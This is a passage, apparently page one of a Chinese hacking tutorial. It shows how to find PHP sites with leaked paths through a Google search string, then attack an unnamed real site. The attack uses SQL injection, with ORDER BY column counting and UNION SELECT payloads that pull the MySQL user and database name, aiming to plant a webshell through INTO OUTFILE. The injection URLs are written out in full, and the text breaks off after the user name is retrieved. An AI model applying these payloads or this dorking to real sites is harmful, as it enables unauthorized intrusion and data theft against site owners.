新买的黑手上介绍了一种快速拿php网站的方法(hackall写的横扫PHP系列)，是通过google搜索数据库连接错误提示的方法，通过google输入：warning include d:\ inurl:php。具体的大家看书去吧。我找到一个网站，提示的信息如图：

　　错误提示中报了网站的路径，如果我们有相应的权限和信息，就可以直接利用into outfile得到webshell了。通过测试。发现该网站存在注入漏洞，利用order by语句迅速得到改表的字段数目是3(不是所有的都支持ORDER BY语句)，于是提交http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,2,3，得到的结果如图

　　2的位置可以利用，

　　于是提交

　　http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,user(),3

　　http://www.***.com/dealer.php?id=189%20and%201=2%20union%20select%201,database(),3

　　得到了用户名和数据名(user()和database()是MYSQL的内置函数)，如图

　　MYSQL用户名

[1] [2] [3] 下一页